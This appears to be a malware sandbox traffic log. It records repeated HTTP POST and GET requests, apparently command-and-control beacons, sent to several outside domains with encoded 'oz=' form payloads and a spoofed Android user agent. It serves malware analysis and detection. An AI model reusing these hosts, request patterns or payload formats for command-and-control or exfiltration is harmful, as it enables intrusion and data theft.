        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 58 31 47 76 52 66 63 73 44 4a 6a 63 75 79 4f 6d 48 6b 49 44 72 39 54 42 42 2b 45 54 5a 30 2b 49 4e 42 64 78 2f 35 6d 61 52 62 66 6d 2f 54 74 7a 72 49 39 49 65 2f 56 4c 6b 42 52 41 58 6e 51 35 44 78 4b 6a 42 6e 42 32 54 67 2b 71 57 63 32 34 7a 6d 38 69 4b 42 71 55 58 5a 7a 42 51 4d 42 74 62 5a 36 66 56 38 63 32 34 75 51 30 6e 33 7a 66 61 75 4e 4a 68 70 39 7a 2f 45 6d 34 57 6d 77 37 6f 77 73 74 4e 77 79 51 78 74 45 4c 39 50 71 32 78 7a 35 56 73 34 2b 49 55 31 6e 71 34 48 34 34 2b 2b 79 2f 58 70 39 64 71 31 36 4b 5a 55 69 76 4e 72 55 70 51 3d 3d Data Ascii: oz=qRo7UWlGE2pUjX1GvRfcsDJjcuyOmHkIDr9TBB+ETZ0+INBdx/5maRbfm/TtzrI9Ie/VLkBRAXnQ5DxKjBnB2Tg+qWc24zm8iKBqUXZzBQMBtbZ6fV8c24uQ0n3zfauNJhp9z/Em4Wmw7owstNwyQxtEL9Pq2xz5Vs4+IU1nq4H44++y/Xp9dq16KZUivNrUpQ==
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 71 52 6f 37 55 57 6c 47 45 32 70 55 6a 33 6c 47 73 79 33 63 6b 44 4a 67 41 2b 79 4f 73 6e 6b 4d 44 72 68 54 42 41 37 44 54 72 51 2b 49 74 78 64 77 36 5a 6d 5a 52 62 66 30 66 54 6f 33 72 49 36 49 65 7a 72 4c 68 68 52 41 55 62 51 35 42 70 4b 6a 57 7a 4f 6e 54 67 34 7a 6d 63 34 38 7a 6d 38 69 4b 42 71 55 58 39 5a 42 55 67 42 73 71 4a 36 4f 45 38 62 6f 6f 75 66 33 6e 33 7a 62 61 75 7a 4a 68 6f 65 7a 36 67 63 34 55 75 77 37 6f 67 73 74 63 77 78 61 78 74 43 50 39 4f 47 78 68 6d 75 4e 75 34 6a 59 6e 4a 33 74 72 2f 7a 30 49 76 6f 69 6c 64 5a 65 35 70 49 4f 70 74 4b 74 50 71 50 30 65 50 52 51 4f 55 49 34 57 77 46 6f 4d 43 75 35 47 54 78 4f 61 4d 3d Data Ascii: oz=qRo7UWlGE2pUj3lGsy3ckDJgA+yOsnkMDrhTBA7DTrQ+Itxdw6ZmZRbf0fTo3rI6IezrLhhRAUbQ5BpKjWzOnTg4zmc48zm8iKBqUX9ZBUgBsqJ6OE8boouf3n3zbauzJhoez6gc4Uuw7ogstcwxaxtCP9OGxhmuNu4jYnJ3tr/z0IvoildZe5pIOptKtPqP0ePRQOUI4WwFoMCu5GTxOaM=
        Source: global trafficHTTP traffic detected: POST /txr6/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.ngmr.xyzOrigin: http://www.ngmr.xyzReferer: http://www.ngmr.xyz/txr6/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /txr6/?oz=nTAbXiRbAR9Tmn1EygfckhJ8auTVp3cQBZgFAHmQGrw0Kpxo+btzHXTBwKiLhdY3AsfxfRA0GE/MmBFG+RiimQs6glJH3Tq6ibBpV287KGVZpLZHDS41jcE=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.ngmr.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 57 37 77 45 68 62 50 66 6a 64 58 32 48 4e 45 7a 31 32 6e 6e 37 4c 49 62 4d 5a 77 42 38 6f 5a 50 49 63 43 53 5a 6e 74 4c 78 52 55 75 45 75 7a 53 32 56 72 75 44 78 47 6c 58 65 53 32 38 44 2b 37 42 68 72 42 51 4f 2f 65 76 76 7a 65 5a 78 30 4d 4b 35 2f 63 7a 43 51 61 74 55 52 4b 2f 50 4b 55 2b 4f 65 6c 6d 4b 62 58 61 50 54 6d 42 46 36 4a 39 6e 63 35 33 52 31 6b 73 44 49 49 38 2b 70 51 75 74 7a 32 68 70 69 76 31 47 4f 46 58 34 59 48 76 4a 37 49 4f 5a 66 66 38 6d 64 42 4d 46 36 54 64 79 71 47 4b 48 73 74 67 6f 54 4c 54 32 34 66 50 43 79 6e 6a 77 3d 3d Data Ascii: oz=AsGHKhpyYI3IW7wEhbPfjdX2HNEz12nn7LIbMZwB8oZPIcCSZntLxRUuEuzS2VruDxGlXeS28D+7BhrBQO/evvzeZx0MK5/czCQatURK/PKU+OelmKbXaPTmBF6J9nc53R1ksDII8+pQutz2hpiv1GOFX4YHvJ7IOZff8mdBMF6TdyqGKHstgoTLT24fPCynjw==
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 41 73 47 48 4b 68 70 79 59 49 33 49 45 4b 41 45 69 38 6a 66 32 4e 58 31 4d 74 45 7a 38 57 6e 64 37 4c 45 62 4d 59 30 52 38 61 39 50 49 39 79 53 65 56 46 4c 79 52 55 75 50 4f 79 61 79 56 72 68 44 78 4c 47 58 66 75 32 38 44 71 37 42 67 62 42 54 39 6e 66 75 2f 7a 63 52 52 30 4f 55 4a 2f 63 7a 43 51 61 74 55 45 74 2f 4a 69 55 2b 2f 75 6c 70 4f 50 55 45 66 54 68 43 46 36 4a 71 58 63 39 33 52 31 38 73 44 34 6d 38 38 42 51 75 73 44 32 68 39 4f 73 76 57 4f 66 59 59 5a 4e 68 36 53 76 4a 6f 7a 33 31 6b 70 71 4e 6c 43 6d 63 6b 37 63 58 31 59 4a 6a 37 50 35 58 47 42 33 4e 41 7a 38 2b 77 66 4e 32 47 7a 69 39 79 49 77 69 57 62 30 71 57 31 57 41 62 49 3d Data Ascii: oz=AsGHKhpyYI3IEKAEi8jf2NX1MtEz8Wnd7LEbMY0R8a9PI9ySeVFLyRUuPOyayVrhDxLGXfu28Dq7BgbBT9nfu/zcRR0OUJ/czCQatUEt/JiU+/ulpOPUEfThCF6JqXc93R18sD4m88BQusD2h9OsvWOfYYZNh6SvJoz31kpqNlCmck7cX1YJj7P5XGB3NAz8+wfN2Gzi9yIwiWb0qW1WAbI=
        Source: global trafficHTTP traffic detected: POST /7cy1/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineOrigin: http://www.albero-dveri.onlineReferer: http://www.albero-dveri.online/7cy1/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /7cy1/?oz=NuunJUERQovrcOQM4pbN0sXyOdFy/3jSqqQUAe4+iYgeK7ulJS9OoncvbeOag3vILBHdN8yfojyADwDpW/rc4czucw94LLL42y8tkGUt2pDt0O2/v+PPRf0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.albero-dveri.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 7a 2f 71 4c 33 7a 30 33 6c 41 54 33 54 30 77 56 50 39 6f 41 4f 4d 65 41 63 62 48 4e 7a 68 39 45 35 71 35 32 38 76 42 78 41 75 74 7a 4b 74 36 38 74 30 53 71 43 43 50 66 34 42 71 5a 6c 72 31 64 52 54 34 2b 50 43 41 36 59 5a 67 31 34 6e 59 74 66 72 78 51 41 78 43 51 72 44 4d 59 6f 79 4e 5a 47 38 59 69 66 36 4b 50 30 2f 5a 46 31 63 35 79 62 76 52 43 44 56 55 75 6f 43 39 35 57 59 67 78 64 76 31 6e 4a 4f 41 55 38 50 5a 31 6b 76 4d 78 76 5a 48 64 55 77 58 7a 71 61 4b 78 73 38 53 4f 42 32 32 50 5a 7a 32 53 58 44 41 44 70 46 38 4b 51 33 48 4e 5a 41 3d 3d Data Ascii: oz=ThgGZIXTrmN3z/qL3z03lAT3T0wVP9oAOMeAcbHNzh9E5q528vBxAutzKt68t0SqCCPf4BqZlr1dRT4+PCA6YZg14nYtfrxQAxCQrDMYoyNZG8Yif6KP0/ZF1c5ybvRCDVUuoC95WYgxdv1nJOAU8PZ1kvMxvZHdUwXzqaKxs8SOB22PZz2SXDADpF8KQ3HNZA==
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 54 68 67 47 5a 49 58 54 72 6d 4e 33 38 36 69 4c 79 51 63 33 6a 67 54 30 4b 30 77 56 57 4e 6f 62 4f 4d 69 41 63 61 44 64 7a 7a 5a 45 34 50 46 32 39 74 35 78 4e 4f 74 7a 53 39 36 31 6a 55 53 31 43 43 44 74 34 42 6d 5a 6c 72 78 64 52 54 6f 2b 50 7a 41 39 5a 4a 67 37 6b 6e 59 72 43 37 78 51 41 78 43 51 72 44 4a 51 6f 79 56 5a 47 49 63 69 66 66 6d 4d 33 2f 59 33 6a 4d 35 79 66 76 52 47 44 56 55 59 6f 44 67 63 57 64 6b 78 64 75 46 6e 49 62 73 54 32 50 5a 7a 70 50 4e 43 67 72 53 51 63 51 76 56 76 39 75 35 6a 75 6d 46 41 67 6e 56 45 42 43 32 55 51 63 78 74 31 46 69 53 31 47 57 45 50 4f 6a 4c 4f 39 46 38 4e 64 46 62 69 4e 64 62 2f 31 61 69 46 73 3d Data Ascii: oz=ThgGZIXTrmN386iLyQc3jgT0K0wVWNobOMiAcaDdzzZE4PF29t5xNOtzS961jUS1CCDt4BmZlrxdRTo+PzA9ZJg7knYrC7xQAxCQrDJQoyVZGIciffmM3/Y3jM5yfvRGDVUYoDgcWdkxduFnIbsT2PZzpPNCgrSQcQvVv9u5jumFAgnVEBC2UQcxt1FiS1GWEPOjLO9F8NdFbiNdb/1aiFs=
        Source: global trafficHTTP traffic detected: POST /qjs8/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.typ67.topOrigin: http://www.typ67.topReferer: http://www.typ67.top/qjs8/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /qjs8/?oz=ejIma/W1pGRFx7ChnTgroDHkNn1VdqZgcszQV8LCwj4556o206I/YZ5OId3qzm2jECDslwuStodYNwU7Ng5KBO4as1dQdJVJJimzghFMohwqM9lhe6W/0oM=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.typ67.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 72 51 58 4c 6e 58 46 45 75 59 4a 41 34 65 63 77 64 4e 2b 61 47 50 30 5a 31 4e 73 64 46 73 74 4c 52 65 64 52 63 42 44 62 38 43 72 62 41 6b 6a 75 6e 42 7a 79 48 36 47 6c 2f 70 62 6e 46 53 6b 4a 51 57 59 43 62 64 76 74 76 49 30 59 33 49 53 51 64 52 76 48 6b 79 62 34 78 49 49 79 79 4e 73 79 31 52 6b 46 6f 46 58 47 53 62 31 6f 63 33 66 70 6e 66 79 68 4b 75 58 6f 37 6c 41 4c 32 44 71 66 49 55 31 57 6d 46 31 74 44 36 58 5a 4a 65 38 6b 51 44 56 78 31 49 77 42 50 66 41 61 57 69 48 6f 55 55 58 63 59 6e 6d 6a 73 6b 64 51 37 57 56 78 4f 6a 69 31 55 67 3d 3d Data Ascii: oz=ZqAKhjHDqXd5rQXLnXFEuYJA4ecwdN+aGP0Z1NsdFstLRedRcBDb8CrbAkjunBzyH6Gl/pbnFSkJQWYCbdvtvI0Y3ISQdRvHkyb4xIIyyNsy1RkFoFXGSb1oc3fpnfyhKuXo7lAL2DqfIU1WmF1tD6XZJe8kQDVx1IwBPfAaWiHoUUXcYnmjskdQ7WVxOji1Ug==
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 46 4c 51 2b 74 52 64 44 37 62 37 43 72 62 4c 45 6a 72 6a 42 7a 70 48 36 4c 59 2f 6f 33 6e 46 53 41 4a 51 58 49 43 61 75 58 75 39 6f 30 61 39 59 53 4f 5a 52 76 48 6b 79 62 34 78 49 4e 5a 79 4e 6b 79 31 67 55 46 70 67 36 51 65 37 31 72 62 33 66 70 30 50 79 6c 4b 75 57 2f 37 6b 4d 68 32 41 43 66 49 52 4a 57 33 30 31 75 61 4b 58 66 4e 65 39 73 63 68 4d 5a 79 34 63 76 45 50 45 78 54 42 4b 54 52 43 47 47 46 56 53 48 76 33 42 69 2f 6d 73 5a 4d 68 6a 75 4a 6f 45 4a 2b 36 6e 52 75 74 76 7a 64 4a 79 51 71 55 2f 46 55 31 30 3d Data Ascii: oz=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5FLQ+tRdD7b7CrbLEjrjBzpH6LY/o3nFSAJQXICauXu9o0a9YSOZRvHkyb4xINZyNky1gUFpg6Qe71rb3fp0PylKuW/7kMh2ACfIRJW301uaKXfNe9schMZy4cvEPExTBKTRCGGFVSHv3Bi/msZMhjuJoEJ+6nRutvzdJyQqU/FU10=
        Source: global trafficHTTP traffic detected: POST /phvf/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.greekhause.orgOrigin: http://www.greekhause.orgReferer: http://www.greekhause.org/phvf/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /phvf/?oz=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.greekhause.orgConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 36 68 50 34 43 49 6d 57 44 75 6e 79 47 71 30 4d 74 4c 6a 35 72 34 39 4e 49 45 76 78 59 36 2b 70 70 44 4a 37 45 78 32 30 43 39 55 55 62 71 46 76 4f 76 73 42 52 54 45 51 44 64 53 45 5a 46 61 42 41 4d 78 71 2b 59 4b 4d 42 43 53 68 67 50 6f 46 6a 41 46 59 47 69 50 76 59 6b 4d 54 30 46 7a 70 79 45 58 74 39 6c 31 76 48 56 34 79 63 59 73 72 50 47 4f 4e 71 68 74 77 43 37 46 50 31 41 79 76 36 48 65 53 68 71 35 37 41 61 39 30 7a 4f 44 67 76 38 43 35 70 51 67 51 68 65 32 63 38 4e 32 2f 6a 6f 46 6d 43 64 68 42 30 51 64 71 65 6a 38 57 77 48 54 72 5a 77 3d 3d Data Ascii: oz=GBk3MDGQZQHC6hP4CImWDunyGq0MtLj5r49NIEvxY6+ppDJ7Ex20C9UUbqFvOvsBRTEQDdSEZFaBAMxq+YKMBCShgPoFjAFYGiPvYkMT0FzpyEXt9l1vHV4ycYsrPGONqhtwC7FP1Ayv6HeShq57Aa90zODgv8C5pQgQhe2c8N2/joFmCdhB0Qdqej8WwHTrZw==
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36Data Raw: 6f 7a 3d 47 42 6b 33 4d 44 47 51 5a 51 48 43 34 42 66 34 42 72 65 57 53 2b 6e 31 4a 4b 30 4d 36 62 6a 39 72 34 78 4e 49 47 44 62 59 50 4f 70 6e 43 35 37 46 7a 53 30 48 39 55 55 50 61 46 6d 52 66 73 61 52 54 35 74 44 66 57 45 5a 46 4f 42 41 49 31 71 2b 70 4b 4e 54 69 54 48 31 66 6f 44 74 67 46 59 47 69 50 76 59 6e 77 35 30 46 4c 70 7a 31 6e 74 73 77 56 6f 4c 31 34 31 62 59 73 72 4c 47 4f 42 71 68 73 56 43 35 78 70 31 43 61 76 36 46 47 53 68 62 35 38 4f 61 38 39 2f 65 44 77 69 63 62 56 6f 54 6f 74 77 4f 33 50 36 2b 71 57 6d 2b 55 38 66 76 56 6c 33 44 42 59 61 54 46 2b 79 46 53 77 45 37 2b 58 4f 43 78 65 2b 44 68 66 53 63 4e 38 73 64 59 53 41 72 49 3d Data Ascii: oz=GBk3MDGQZQHC4Bf4BreWS+n1JK0M6bj9r4xNIGDbYPOpnC57FzS0H9UUPaFmRfsaRT5tDfWEZFOBAI1q+pKNTiTH1foDtgFYGiPvYnw50FLpz1ntswVoL141bYsrLGOBqhsVC5xp1Cav6FGShb58Oa89/eDwicbVoTotwO3P6+qWm+U8fvVl3DBYaTF+yFSwE7+XOCxe+DhfScN8sdYSArI=
        Source: global trafficHTTP traffic detected: POST /d84b/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.dorikis.onlineOrigin: http://www.dorikis.onlineReferer: http://www.dorikis.online/d84b/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: GET /d84b/?oz=LDMXP2ida3jj6Wv8YbWYWcXQGJdr9fjlzYlCdzHaAPX6jElzFVuifqg0YZMPIM8JGTBjffDneHOFDPAe46iMAyLvyO9+lRB2GxTtOnRawDOQ6U7+wx9GICg=&UJ9=qN-llTKPHxntPrv0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dorikis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qo4k/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoOrigin: http://www.platinumkitchens.infoReferer: http://www.platinumkitchens.info/qo4k/Content-Length: 199Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qo4k/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoOrigin: http://www.platinumkitchens.infoReferer: http://www.platinumkitchens.info/qo4k/Content-Length: 219Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
        Source: global trafficHTTP traffic detected: POST /qo4k/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.platinumkitchens.infoOrigin: http://www.platinumkitchens.infoReferer: http://www.platinumkitchens.info/qo4k/Content-Length: 7367Cache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
